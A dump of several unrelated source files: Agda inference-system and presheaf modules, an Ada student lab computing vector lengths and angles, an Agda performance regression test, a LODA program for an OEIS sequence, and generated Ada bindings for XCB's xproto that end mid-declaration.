-------------------------------------------------------------------------------- -- This is part of Agda Inference Systems open import Agda.Builtin.Equality open import Data.Product open import Data.Sum open import Data.Vec using (Vec; fromList; length) renaming (lookup to get) open import Data.Fin using (Fin) open import Level open import Relation.Unary using (_⊆_) module is-lib.InfSys.Base {𝓁} where record MetaRule {𝓁c 𝓁p : Level} (U : Set 𝓁) : Set (𝓁 ⊔ suc 𝓁c ⊔ suc 𝓁p) where field Ctx : Set 𝓁c Pos : Ctx → Set 𝓁p prems : (c : Ctx) → Pos c → U conclu : Ctx → U addSideCond : ∀{𝓁'} → (U → Set 𝓁') → MetaRule {𝓁c ⊔ 𝓁'} U (addSideCond P) .Ctx = Σ[ c ∈ Ctx ] P (conclu c) (addSideCond P) .Pos (c , _) = Pos c (addSideCond P) .prems (c , _) p = prems c p (addSideCond P) .conclu (c , _) = conclu c RF[_] : ∀{𝓁'} → (U → Set 𝓁') → (U → Set _) RF[_] P u = Σ[ c ∈ Ctx ] (u ≡ conclu c × (∀ p → P (prems c p))) RClosed : ∀{𝓁'} → (U → Set 𝓁') → Set _ RClosed P = ∀ c → (∀ p → P (prems c p)) → P (conclu c) {- Finitary Rule -} record FinMetaRule {𝓁c n} (U : Set 𝓁) : Set (𝓁 ⊔ suc 𝓁c) where field Ctx : Set 𝓁c comp : Ctx → Vec U n × U from : MetaRule {𝓁c} {zero} U from .MetaRule.Ctx = Ctx from .MetaRule.Pos = λ _ → Fin n from .MetaRule.prems c n = get (proj₁ (comp c)) n from .MetaRule.conclu c = proj₂ (comp c) open MetaRule record IS {𝓁c 𝓁p 𝓁n : Level} (U : Set 𝓁) : Set (𝓁 ⊔ suc 𝓁c ⊔ suc 𝓁p ⊔ suc 𝓁n) where field Names : Set 𝓁n rules : Names → MetaRule {𝓁c} {𝓁p} U ISF[_] : ∀{𝓁'} → (U → Set 𝓁') → (U → Set _) ISF[_] P u = Σ[ rn ∈ Names ] RF[ rules rn ] P u ISClosed : ∀{𝓁'} → (U → Set 𝓁') → Set _ ISClosed P = ∀ rn → RClosed (rules rn) P open IS _∪_ : ∀{𝓁c 𝓁p 𝓁n 𝓁n'}{U : Set 𝓁} → IS {𝓁c} {𝓁p} {𝓁n} U → IS {_} {_} {𝓁n'} U → IS {_} {_} {𝓁n ⊔ 𝓁n'} U (is1 ∪ is2) .Names = (is1 .Names) ⊎ (is2 .Names) (is1 ∪ is2) .rules = [ is1 .rules , is2 .rules ] _⊓_ : ∀{𝓁c 𝓁p 𝓁n 𝓁'}{U : Set 𝓁} → IS {𝓁c} {𝓁p} {𝓁n} U → (U → Set 𝓁') → IS {𝓁c ⊔ 𝓁'} {_} {_} U (is ⊓ P) .Names = is .Names (is ⊓ P) .rules rn = addSideCond (is .rules rn) P {- Properties -} -- closed implies prefix closed⇒prefix : ∀{𝓁c 𝓁p}{U : Set 𝓁} → (m : MetaRule {𝓁c} {𝓁p} U) → ∀{𝓁'}{P : U → Set 𝓁'} → RClosed m {𝓁'} P → RF[ m ] P ⊆ P closed⇒prefix _ cl (_ , refl , pr) = cl _ pr -- prefix implies closed prefix⇒closed : ∀{𝓁c 𝓁p}{U : Set 𝓁} → (m : MetaRule {𝓁c} {𝓁p} U) → ∀{𝓁'}{P : U → Set 𝓁'} → (RF[ m ] P ⊆ P) → RClosed m {𝓁'} P prefix⇒closed _ prf c pr = prf (c , refl , pr)
Cubical/Categories/Presheaf.agda
Edlyr/cubical
0
7199
{-# OPTIONS --cubical --no-import-sorts --postfix-projections --safe #-} module Cubical.Categories.Presheaf where open import Cubical.Categories.Presheaf.Base public open import Cubical.Categories.Presheaf.Properties public open import Cubical.Categories.Presheaf.KanExtension public
Lab2/lab2.adb
albinjal/ada_basic
3
2623
<filename>Lab2/lab2.adb -- Ett givet huvudprogram för laboration 2. -- Du skall inte ändra på den del som är given, endast lägga till. with Ada.Text_IO; use Ada.Text_IO; with Ada.Integer_Text_IO; use Ada.Integer_Text_IO; --with Ada.Float_Text_IO; use Ada.Float_Text_IO; with Ada.Numerics.Elementary_Functions; use Ada.Numerics.Elementary_Functions; procedure Lab2 is procedure Create_Vector_Data(Xa,Ya,Za,Xb,Yb,Zb: in Integer; L,Vy,Vz: out Integer) is ---------------------------------------------------------------- function MakeDeg(Rad: in Float) return Float is Deg: Float; begin Deg := Rad *(180.0/3.1415); return Deg; end MakeDeg; ---------------------------------------------------------------- ---------------------------------------------------------------- procedure GetL(Cx,Cy,Cz: in Integer; L: out Integer) is -- Tar in koordinater och returnerar längden mellan dem Lflt: Float; begin Lflt:=Float((Cx)**2+(Cy)**2+(Cz)**2); Lflt:=Sqrt(Lflt); L := Integer(Lflt); end GetL; ---------------------------------------------------------------- ---------------------------------------------------------------- procedure GetVz(Opp, Adj: in Integer; V: out Integer) is --Tar in 2D komponenter och matar ut Vinkeln i grader Fa,Fda: Float; begin if Adj = 0 then -- Division med noll if Opp = 0 then V := 1337; else if Opp > 0 then V := 90; else V := 270; end if; end if; else Fa := Arctan(Float(Opp) / Float(Adj)); if Adj < 0 then Fa := Fa + 3.14; end if; Fda := MakeDeg(Fa); V := Integer(Fda); end if; end GetVz; ---------------------------------------------------------------- --------------------------------------------------------------- procedure GetVy(Adj, Hyp: in Integer; Vy: out Integer) is VyF, VyFa: Float; begin -- REAL-ISH -- VyF := Arccos(Float(Adj) / Float(Hyp)); -- CRAP if Hyp = 0 then -- Division med noll Vy := 1337; else VyF := Arccos(Float(Adj / 100) / Float(Hyp / 100)); VyFa := MakeDeg(VyF); Vy := Integer(VyFa); end if; end GetVy; --------------------------------------------------------------- Cx,Cy,Cz: Integer; begin Cx:=Xb-Xa; Cy:=Yb-Ya; Cz:=Zb-Za; GetL(Cx,Cy,Cz, L); GetVz(Cy,Cx,Vz); GetVy(Cz,L, Vy); L := L / 100; end Create_Vector_Data; -- Lägg till dina underprogram... Xa, Ya, Za, Xb, Yb, Zb : Integer; L, Vy, Vz : Integer; begin Put("Mata in punkten A i cm (X, Y, Z): "); Get(Xa); Get(Ya); Get(Za); Put("Mata in punkten B i cm (X, Y, Z): "); Get(Xb); Get(Yb); Get(Zb); -- På denna rad du lägga till (exakt) ett anrop till Create_Vector_Data Create_Vector_Data(Xa, Ya, Za, Xb, Yb, Zb, L, Vy, Vz); Put_Line("Längd (i m) Vy Vz"); Put(L, Width => 11); Put(Vy, Width => 7); Put(Vz, Width => 7); New_Line; end Lab2;
test/Succeed/Issue3621.agda
cruhland/agda
1,989
12170
<reponame>cruhland/agda -- Andreas, 2019-03-18, AIM XXIX, performance regression in 2.5.4 -- The following was quick in 2.5.3 postulate Bool : Set Foo : Bool → Bool → Bool → Bool → Bool → Bool → Bool → Bool → Bool → Set data FooRel : (x1 x1' : Bool) (x2 x2' : Bool) (x3 x3' : Bool) (x4 x4' : Bool) (x5 x5' : Bool) (x6 x6' : Bool) (x7 x7' : Bool) (x8 x8' : Bool) (x9 x9' : Bool) → Foo x1 x2 x3 x4 x5 x6 x7 x8 x9 → Foo x1' x2' x3' x4' x5' x6' x7' x8' x9' → Set where tran : (x1 x1' x1'' : Bool) (x2 x2' x2'' : Bool) (x3 x3' x3'' : Bool) (x4 x4' x4'' : Bool) (x5 x5' x5'' : Bool) (x6 x6' x6'' : Bool) (x7 x7' x7'' : Bool) (x8 x8' x8'' : Bool) (x9 x9' x9'' : Bool) (t : Foo x1 x2 x3 x4 x5 x6 x7 x8 x9) (t' : Foo x1' x2' x3' x4' x5' x6' x7' x8' x9') (t'' : Foo x1'' x2'' x3'' x4'' x5'' x6'' x7'' x8'' x9'') → FooRel x1 x1' x2 x2' x3 x3' x4 x4' x5 x5' x6 x6' x7 x7' x8 x8' x9 x9' t t' → FooRel x1' x1'' x2' x2'' x3' x3'' x4' x4'' x5' x5'' x6' x6'' x7' x7'' x8' x8'' x9' x9'' t' t'' → FooRel x1 x1'' x2 x2'' x3 x3'' x4 x4'' x5 x5'' x6 x6'' x7 x7'' x8 x8'' x9 x9'' t t'' foo : (x1 x1' : Bool) (x2 x2' : Bool) (x3 x3' : Bool) (x4 x4' : Bool) (x5 x5' : Bool) (x6 x6' : Bool) (x7 x7' : Bool) (x8 x8' : Bool) (x9 x9' : Bool) (t : Foo x1 x2 x3 x4 x5 x6 x7 x8 x9) (t' : Foo x1' x2' x3' x4' x5' x6' x7' x8' x9') → FooRel x1 x1' x2 x2' x3 x3' x4 x4' x5 x5' x6 x6' x7 x7' x8 x8' x9 x9' t t' → Set foo x1 x1' x2 x2' x3 x3' x4 x4' x5 x5' x6 x6' x7 x7' x8 x8' x9 x9' t t' (tran .x1 x1'' .x1' .x2 x2'' .x2' .x3 x3'' .x3' .x4 x4'' .x4' .x5 x5'' .x5' .x6 x6'' .x6' .x7 x7'' .x7' .x8 x8'' .x8' .x9 x9'' .x9' .t t'' .t' xy yz) = Bool -- Should check quickly again in 2.6.0
oeis/346/A346155.asm
neoneye/loda-programs
11
89096
<reponame>neoneye/loda-programs ; A346155: Partial sums of A007978. ; 2,5,7,10,12,16,18,21,23,26,28,33,35,38,40,43,45,49,51,54,56,59,61,66,68,71,73,76,78,82,84,87,89,92,94,99,101,104,106,109,111,115,117,120,122,125,127,132,134,137,139,142,144,148,150,153,155,158,160,167 mov $2,$0 add $2,1 mov $4,$0 lpb $2 mov $0,$4 sub $2,1 sub $0,$2 seq $0,7978 ; Least non-divisor of n. add $3,$0 lpe mov $0,$3
include/xproto.ads
docandrew/troodon
5
18882
pragma Ada_2012; pragma Style_Checks (Off); with Interfaces.C; use Interfaces.C; with bits_stdint_uintn_h; with bits_stdint_intn_h; with xcb; with System; with Interfaces.C.Strings; package xproto is -- Note: modded these to deconflict with function names CONST_XCB_KEY_PRESS : constant := 2; -- /usr/include/xcb/xproto.h:540 CONST_XCB_KEY_RELEASE : constant := 3; -- /usr/include/xcb/xproto.h:563 CONST_XCB_BUTTON_PRESS : constant := 4; -- /usr/include/xcb/xproto.h:577 CONST_XCB_BUTTON_RELEASE : constant := 5; -- /usr/include/xcb/xproto.h:600 CONST_XCB_MOTION_NOTIFY : constant := 6; -- /usr/include/xcb/xproto.h:610 CONST_XCB_ENTER_NOTIFY : constant := 7; -- /usr/include/xcb/xproto.h:651 CONST_XCB_LEAVE_NOTIFY : constant := 8; -- /usr/include/xcb/xproto.h:674 CONST_XCB_FOCUS_IN : constant := 9; -- /usr/include/xcb/xproto.h:679 CONST_XCB_FOCUS_OUT : constant := 10; -- /usr/include/xcb/xproto.h:694 CONST_XCB_KEYMAP_NOTIFY : constant := 11; -- /usr/include/xcb/xproto.h:699 CONST_XCB_EXPOSE : constant := 12; -- /usr/include/xcb/xproto.h:710 CONST_XCB_GRAPHICS_EXPOSURE : constant := 13; -- /usr/include/xcb/xproto.h:729 CONST_XCB_NO_EXPOSURE : constant := 14; -- /usr/include/xcb/xproto.h:750 CONST_XCB_VISIBILITY_NOTIFY : constant := 15; -- /usr/include/xcb/xproto.h:772 CONST_XCB_CREATE_NOTIFY : constant := 16; -- /usr/include/xcb/xproto.h:787 CONST_XCB_DESTROY_NOTIFY : constant := 17; -- /usr/include/xcb/xproto.h:808 CONST_XCB_UNMAP_NOTIFY : constant := 18; -- /usr/include/xcb/xproto.h:822 CONST_XCB_MAP_NOTIFY : constant := 19; -- /usr/include/xcb/xproto.h:838 CONST_XCB_MAP_REQUEST : constant := 20; -- /usr/include/xcb/xproto.h:854 CONST_XCB_REPARENT_NOTIFY : constant := 21; -- /usr/include/xcb/xproto.h:868 CONST_XCB_CONFIGURE_NOTIFY : constant := 22; -- /usr/include/xcb/xproto.h:887 CONST_XCB_CONFIGURE_REQUEST : constant := 23; -- /usr/include/xcb/xproto.h:909 CONST_XCB_GRAVITY_NOTIFY : constant := 24; -- /usr/include/xcb/xproto.h:930 CONST_XCB_RESIZE_REQUEST : constant := 25; -- /usr/include/xcb/xproto.h:946 CONST_XCB_CIRCULATE_NOTIFY : constant := 26; -- /usr/include/xcb/xproto.h:970 CONST_XCB_CIRCULATE_REQUEST : constant := 27; -- /usr/include/xcb/xproto.h:987 CONST_XCB_PROPERTY_NOTIFY : constant := 28; -- /usr/include/xcb/xproto.h:997 CONST_XCB_SELECTION_CLEAR : constant := 29; -- /usr/include/xcb/xproto.h:1014 CONST_XCB_SELECTION_REQUEST : constant := 30; -- /usr/include/xcb/xproto.h:1106 CONST_XCB_SELECTION_NOTIFY : constant := 31; -- /usr/include/xcb/xproto.h:1124 CONST_XCB_COLORMAP_NOTIFY : constant := 32; -- /usr/include/xcb/xproto.h:1154 CONST_XCB_CLIENT_MESSAGE : constant := 33; -- /usr/include/xcb/xproto.h:1189 CONST_XCB_MAPPING_NOTIFY : constant := 34; -- /usr/include/xcb/xproto.h:1210 CONST_XCB_GE_GENERIC : constant := 35; -- /usr/include/xcb/xproto.h:1226 CONST_XCB_REQUEST : constant := 1; -- /usr/include/xcb/xproto.h:1242 CONST_XCB_VALUE : constant := 2; -- /usr/include/xcb/xproto.h:1258 CONST_XCB_WINDOW : constant := 3; -- /usr/include/xcb/xproto.h:1274 CONST_XCB_PIXMAP : constant := 4; -- /usr/include/xcb/xproto.h:1279 CONST_XCB_ATOM : constant := 5; -- /usr/include/xcb/xproto.h:1284 CONST_XCB_CURSOR : constant := 6; -- /usr/include/xcb/xproto.h:1289 CONST_XCB_FONT : constant := 7; -- /usr/include/xcb/xproto.h:1294 CONST_XCB_MATCH : constant := 8; -- /usr/include/xcb/xproto.h:1299 CONST_XCB_DRAWABLE : constant := 9; -- /usr/include/xcb/xproto.h:1304 CONST_XCB_ACCESS : constant := 10; -- /usr/include/xcb/xproto.h:1309 CONST_XCB_ALLOC : constant := 11; -- /usr/include/xcb/xproto.h:1314 CONST_XCB_COLORMAP : constant := 12; -- /usr/include/xcb/xproto.h:1319 CONST_XCB_G_CONTEXT : constant := 13; -- /usr/include/xcb/xproto.h:1324 CONST_XCB_ID_CHOICE : constant := 14; -- /usr/include/xcb/xproto.h:1329 CONST_XCB_NAME : constant := 15; -- /usr/include/xcb/xproto.h:1334 CONST_XCB_LENGTH : constant := 16; -- /usr/include/xcb/xproto.h:1339 CONST_XCB_IMPLEMENTATION : constant := 17; -- /usr/include/xcb/xproto.h:1344 CONST_XCB_CREATE_WINDOW : constant := 1; -- /usr/include/xcb/xproto.h:1497 CONST_XCB_CHANGE_WINDOW_ATTRIBUTES : constant := 2; -- /usr/include/xcb/xproto.h:1540 CONST_XCB_GET_WINDOW_ATTRIBUTES : constant := 3; -- /usr/include/xcb/xproto.h:1567 CONST_XCB_DESTROY_WINDOW : constant := 4; -- /usr/include/xcb/xproto.h:1605 CONST_XCB_DESTROY_SUBWINDOWS : constant := 5; -- /usr/include/xcb/xproto.h:1618 CONST_XCB_CHANGE_SAVE_SET : constant := 6; -- /usr/include/xcb/xproto.h:1636 CONST_XCB_REPARENT_WINDOW : constant := 7; -- /usr/include/xcb/xproto.h:1649 CONST_XCB_MAP_WINDOW : constant := 8; -- /usr/include/xcb/xproto.h:1665 CONST_XCB_MAP_SUBWINDOWS : constant := 9; -- /usr/include/xcb/xproto.h:1678 CONST_XCB_UNMAP_WINDOW : constant := 10; -- /usr/include/xcb/xproto.h:1691 CONST_XCB_UNMAP_SUBWINDOWS : constant := 11; -- /usr/include/xcb/xproto.h:1704 CONST_XCB_CONFIGURE_WINDOW : constant := 12; -- /usr/include/xcb/xproto.h:1748 CONST_XCB_CIRCULATE_WINDOW : constant := 13; -- /usr/include/xcb/xproto.h:1768 CONST_XCB_GET_GEOMETRY : constant := 14; -- /usr/include/xcb/xproto.h:1788 CONST_XCB_QUERY_TREE : constant := 15; -- /usr/include/xcb/xproto.h:1825 CONST_XCB_INTERN_ATOM : constant := 16; -- /usr/include/xcb/xproto.h:1859 CONST_XCB_GET_ATOM_NAME : constant := 17; -- /usr/include/xcb/xproto.h:1891 CONST_XCB_CHANGE_PROPERTY : constant := 18; -- /usr/include/xcb/xproto.h:1932 CONST_XCB_DELETE_PROPERTY : constant := 19; -- /usr/include/xcb/xproto.h:1950 CONST_XCB_GET_PROPERTY : constant := 20; -- /usr/include/xcb/xproto.h:1975 CONST_XCB_LIST_PROPERTIES : constant := 21; -- /usr/include/xcb/xproto.h:2013 CONST_XCB_SET_SELECTION_OWNER : constant := 22; -- /usr/include/xcb/xproto.h:2038 CONST_XCB_GET_SELECTION_OWNER : constant := 23; -- /usr/include/xcb/xproto.h:2060 CONST_XCB_CONVERT_SELECTION : constant := 24; -- /usr/include/xcb/xproto.h:2084 CONST_XCB_SEND_EVENT : constant := 25; -- /usr/include/xcb/xproto.h:2106 CONST_XCB_GRAB_POINTER : constant := 26; -- /usr/include/xcb/xproto.h:2151 CONST_XCB_UNGRAB_POINTER : constant := 27; -- /usr/include/xcb/xproto.h:2180 CONST_XCB_GRAB_BUTTON : constant := 28; -- /usr/include/xcb/xproto.h:2214 CONST_XCB_UNGRAB_BUTTON : constant := 29; -- /usr/include/xcb/xproto.h:2235 CONST_XCB_CHANGE_ACTIVE_POINTER_GRAB : constant := 30; -- /usr/include/xcb/xproto.h:2250 CONST_XCB_GRAB_KEYBOARD : constant := 31; -- /usr/include/xcb/xproto.h:2273 CONST_XCB_UNGRAB_KEYBOARD : constant := 32; -- /usr/include/xcb/xproto.h:2300 CONST_XCB_GRAB_KEY : constant := 33; -- /usr/include/xcb/xproto.h:2317 CONST_XCB_UNGRAB_KEY : constant := 34; -- /usr/include/xcb/xproto.h:2335 CONST_XCB_ALLOW_EVENTS : constant := 35; -- /usr/include/xcb/xproto.h:2426 CONST_XCB_GRAB_SERVER : constant := 36; -- /usr/include/xcb/xproto.h:2439 CONST_XCB_UNGRAB_SERVER : constant := 37; -- /usr/include/xcb/xproto.h:2451 CONST_XCB_QUERY_POINTER : constant := 38; -- /usr/include/xcb/xproto.h:2470 CONST_XCB_GET_MOTION_EVENTS : constant := 39; -- /usr/include/xcb/xproto.h:2526 CONST_XCB_TRANSLATE_COORDINATES : constant := 40; -- /usr/include/xcb/xproto.h:2560 CONST_XCB_WARP_POINTER : constant := 41; -- /usr/include/xcb/xproto.h:2589 CONST_XCB_SET_INPUT_FOCUS : constant := 42; -- /usr/include/xcb/xproto.h:2627 CONST_XCB_GET_INPUT_FOCUS : constant := 43; -- /usr/include/xcb/xproto.h:2648 CONST_XCB_QUERY_KEYMAP : constant := 44; -- /usr/include/xcb/xproto.h:2678 CONST_XCB_OPEN_FONT : constant := 45; -- /usr/include/xcb/xproto.h:2701 CONST_XCB_CLOSE_FONT : constant := 46; -- /usr/include/xcb/xproto.h:2716 CONST_XCB_QUERY_FONT : constant := 47; -- /usr/include/xcb/xproto.h:2779 CONST_XCB_QUERY_TEXT_EXTENTS : constant := 48; -- /usr/include/xcb/xproto.h:2824 CONST_XCB_LIST_FONTS : constant := 49; -- /usr/include/xcb/xproto.h:2877 CONST_XCB_LIST_FONTS_WITH_INFO : constant := 50; -- /usr/include/xcb/xproto.h:2910 CONST_XCB_SET_FONT_PATH : constant := 51; -- /usr/include/xcb/xproto.h:2949 CONST_XCB_GET_FONT_PATH : constant := 52; -- /usr/include/xcb/xproto.h:2970 CONST_XCB_CREATE_PIXMAP : constant := 53; -- /usr/include/xcb/xproto.h:2994 CONST_XCB_FREE_PIXMAP : constant := 54; -- /usr/include/xcb/xproto.h:3010 CONST_XCB_CREATE_GC : constant := 55; -- /usr/include/xcb/xproto.h:3261 CONST_XCB_CHANGE_GC : constant := 56; -- /usr/include/xcb/xproto.h:3305 CONST_XCB_COPY_GC : constant := 57; -- /usr/include/xcb/xproto.h:3319 CONST_XCB_SET_DASHES : constant := 58; -- /usr/include/xcb/xproto.h:3334 CONST_XCB_SET_CLIP_RECTANGLES : constant := 59; -- /usr/include/xcb/xproto.h:3356 CONST_XCB_FREE_GC : constant := 60; -- /usr/include/xcb/xproto.h:3371 CONST_XCB_CLEAR_AREA : constant := 61; -- /usr/include/xcb/xproto.h:3384 CONST_XCB_COPY_AREA : constant := 62; -- /usr/include/xcb/xproto.h:3401 CONST_XCB_COPY_PLANE : constant := 63; -- /usr/include/xcb/xproto.h:3422 CONST_XCB_POLY_POINT : constant := 64; -- /usr/include/xcb/xproto.h:3453 CONST_XCB_POLY_LINE : constant := 65; -- /usr/include/xcb/xproto.h:3467 CONST_XCB_POLY_SEGMENT : constant := 66; -- /usr/include/xcb/xproto.h:3500 CONST_XCB_POLY_RECTANGLE : constant := 67; -- /usr/include/xcb/xproto.h:3514 CONST_XCB_POLY_ARC : constant := 68; -- /usr/include/xcb/xproto.h:3528 CONST_XCB_FILL_POLY : constant := 69; -- /usr/include/xcb/xproto.h:3548 CONST_XCB_POLY_FILL_RECTANGLE : constant := 70; -- /usr/include/xcb/xproto.h:3565 CONST_XCB_POLY_FILL_ARC : constant := 71; -- /usr/include/xcb/xproto.h:3579 CONST_XCB_PUT_IMAGE : constant := 72; -- /usr/include/xcb/xproto.h:3599 CONST_XCB_GET_IMAGE : constant := 73; -- /usr/include/xcb/xproto.h:3627 CONST_XCB_POLY_TEXT_8 : constant := 74; -- /usr/include/xcb/xproto.h:3657 CONST_XCB_POLY_TEXT_16 : constant := 75; -- /usr/include/xcb/xproto.h:3673 CONST_XCB_IMAGE_TEXT_8 : constant := 76; -- /usr/include/xcb/xproto.h:3689 CONST_XCB_IMAGE_TEXT_16 : constant := 77; -- /usr/include/xcb/xproto.h:3705 CONST_XCB_CREATE_COLORMAP : constant := 78; -- /usr/include/xcb/xproto.h:3726 CONST_XCB_FREE_COLORMAP : constant := 79; -- /usr/include/xcb/xproto.h:3741 CONST_XCB_COPY_COLORMAP_AND_FREE : constant := 80; -- /usr/include/xcb/xproto.h:3754 CONST_XCB_INSTALL_COLORMAP : constant := 81; -- /usr/include/xcb/xproto.h:3768 CONST_XCB_UNINSTALL_COLORMAP : constant := 82; -- /usr/include/xcb/xproto.h:3781 CONST_XCB_LIST_INSTALLED_COLORMAPS : constant := 83; -- /usr/include/xcb/xproto.h:3801 CONST_XCB_ALLOC_COLOR : constant := 84; -- /usr/include/xcb/xproto.h:3833 CONST_XCB_ALLOC_NAMED_COLOR : constant := 85; -- /usr/include/xcb/xproto.h:3872 CONST_XCB_ALLOC_COLOR_CELLS : constant := 86; -- /usr/include/xcb/xproto.h:3911 CONST_XCB_ALLOC_COLOR_PLANES : constant := 87; -- /usr/include/xcb/xproto.h:3946 CONST_XCB_FREE_COLORS : constant := 88; -- /usr/include/xcb/xproto.h:3979 CONST_XCB_STORE_COLORS : constant := 89; -- /usr/include/xcb/xproto.h:4020 CONST_XCB_STORE_NAMED_COLOR : constant := 90; -- /usr/include/xcb/xproto.h:4033 CONST_XCB_QUERY_COLORS : constant := 91; -- /usr/include/xcb/xproto.h:4075 CONST_XCB_LOOKUP_COLOR : constant := 92; -- /usr/include/xcb/xproto.h:4107 CONST_XCB_CREATE_CURSOR : constant := 93; -- /usr/include/xcb/xproto.h:4142 CONST_XCB_CREATE_GLYPH_CURSOR : constant := 94; -- /usr/include/xcb/xproto.h:4169 CONST_XCB_FREE_CURSOR : constant := 95; -- /usr/include/xcb/xproto.h:4192 CONST_XCB_RECOLOR_CURSOR : constant := 96; -- /usr/include/xcb/xproto.h:4205 CONST_XCB_QUERY_BEST_SIZE : constant := 97; -- /usr/include/xcb/xproto.h:4237 CONST_XCB_QUERY_EXTENSION : constant := 98; -- /usr/include/xcb/xproto.h:4271 CONST_XCB_LIST_EXTENSIONS : constant := 99; -- /usr/include/xcb/xproto.h:4306 CONST_XCB_CHANGE_KEYBOARD_MAPPING : constant := 100; -- /usr/include/xcb/xproto.h:4329 CONST_XCB_GET_KEYBOARD_MAPPING : constant := 101; -- /usr/include/xcb/xproto.h:4351 CONST_XCB_CHANGE_KEYBOARD_CONTROL : constant := 102; -- /usr/include/xcb/xproto.h:4412 CONST_XCB_GET_KEYBOARD_CONTROL : constant := 103; -- /usr/include/xcb/xproto.h:4432 CONST_XCB_BELL : constant := 104; -- /usr/include/xcb/xproto.h:4461 CONST_XCB_CHANGE_POINTER_CONTROL : constant := 105; -- /usr/include/xcb/xproto.h:4473 CONST_XCB_GET_POINTER_CONTROL : constant := 106; -- /usr/include/xcb/xproto.h:4497 CONST_XCB_SET_SCREEN_SAVER : constant := 107; -- /usr/include/xcb/xproto.h:4535 CONST_XCB_GET_SCREEN_SAVER : constant := 108; -- /usr/include/xcb/xproto.h:4558 CONST_XCB_CHANGE_HOSTS : constant := 109; -- /usr/include/xcb/xproto.h:4598 CONST_XCB_LIST_HOSTS : constant := 110; -- /usr/include/xcb/xproto.h:4638 CONST_XCB_SET_ACCESS_CONTROL : constant := 111; -- /usr/include/xcb/xproto.h:4667 CONST_XCB_SET_CLOSE_DOWN_MODE : constant := 112; -- /usr/include/xcb/xproto.h:4685 CONST_XCB_KILL_CLIENT : constant := 113; -- /usr/include/xcb/xproto.h:4701 CONST_XCB_ROTATE_PROPERTIES : constant := 114; -- /usr/include/xcb/xproto.h:4714 CONST_XCB_FORCE_SCREEN_SAVER : constant := 115; -- /usr/include/xcb/xproto.h:4734 CONST_XCB_SET_POINTER_MAPPING : constant := 116; -- /usr/include/xcb/xproto.h:4759 CONST_XCB_GET_POINTER_MAPPING : constant := 117; -- /usr/include/xcb/xproto.h:4788 CONST_XCB_SET_MODIFIER_MAPPING : constant := 118; -- /usr/include/xcb/xproto.h:4829 CONST_XCB_GET_MODIFIER_MAPPING : constant := 119; -- /usr/include/xcb/xproto.h:4858 CONST_XCB_NO_OPERATION : constant := 127; -- /usr/include/xcb/xproto.h:4881 -- * This file generated automatically from xproto.xml by c_client.py. -- * Edit at your peril. -- --* -- * @defgroup XCB__API XCB API -- * @brief XCB Protocol Implementation. -- * @{ -- * --* -- * @brief xcb_char2b_t -- * type xcb_char2b_t is record byte1 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:25 byte2 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:26 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:24 --* -- * @brief xcb_char2b_iterator_t -- * type xcb_char2b_iterator_t is record data : access xcb_char2b_t; -- /usr/include/xcb/xproto.h:33 c_rem : aliased int; -- /usr/include/xcb/xproto.h:34 index : aliased int; -- /usr/include/xcb/xproto.h:35 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:32 subtype xcb_window_t is bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:38 --* -- * @brief xcb_window_iterator_t -- * type xcb_window_iterator_t is record data : access xcb_window_t; -- /usr/include/xcb/xproto.h:44 c_rem : aliased int; -- /usr/include/xcb/xproto.h:45 index : aliased int; -- /usr/include/xcb/xproto.h:46 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:43 subtype xcb_pixmap_t is bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:49 --* -- * @brief xcb_pixmap_iterator_t -- * type xcb_pixmap_iterator_t is record data : access xcb_pixmap_t; -- /usr/include/xcb/xproto.h:55 c_rem : aliased int; -- /usr/include/xcb/xproto.h:56 index : aliased int; -- /usr/include/xcb/xproto.h:57 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:54 subtype xcb_cursor_t is bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:60 --* -- * @brief xcb_cursor_iterator_t -- * type xcb_cursor_iterator_t is record data : access xcb_cursor_t; -- /usr/include/xcb/xproto.h:66 c_rem : aliased int; -- /usr/include/xcb/xproto.h:67 index : aliased int; -- /usr/include/xcb/xproto.h:68 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:65 subtype xcb_font_t is bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:71 --* -- * @brief xcb_font_iterator_t -- * type xcb_font_iterator_t is record data : access xcb_font_t; -- /usr/include/xcb/xproto.h:77 c_rem : aliased int; -- /usr/include/xcb/xproto.h:78 index : aliased int; -- /usr/include/xcb/xproto.h:79 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:76 subtype xcb_gcontext_t is bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:82 --* -- * @brief xcb_gcontext_iterator_t -- * type xcb_gcontext_iterator_t is record data : access xcb_gcontext_t; -- /usr/include/xcb/xproto.h:88 c_rem : aliased int; -- /usr/include/xcb/xproto.h:89 index : aliased int; -- /usr/include/xcb/xproto.h:90 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:87 subtype xcb_colormap_t is bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:93 --* -- * @brief xcb_colormap_iterator_t -- * type xcb_colormap_iterator_t is record data : access xcb_colormap_t; -- /usr/include/xcb/xproto.h:99 c_rem : aliased int; -- /usr/include/xcb/xproto.h:100 index : aliased int; -- /usr/include/xcb/xproto.h:101 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:98 subtype xcb_atom_t is bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:104 --* -- * @brief xcb_atom_iterator_t -- * type xcb_atom_iterator_t is record data : access xcb_atom_t; -- /usr/include/xcb/xproto.h:110 c_rem : aliased int; -- /usr/include/xcb/xproto.h:111 index : aliased int; -- /usr/include/xcb/xproto.h:112 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:109 subtype xcb_drawable_t is bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:115 --* -- * @brief xcb_drawable_iterator_t -- * type xcb_drawable_iterator_t is record data : access xcb_drawable_t; -- /usr/include/xcb/xproto.h:121 c_rem : aliased int; -- /usr/include/xcb/xproto.h:122 index : aliased int; -- /usr/include/xcb/xproto.h:123 end record with Convention => 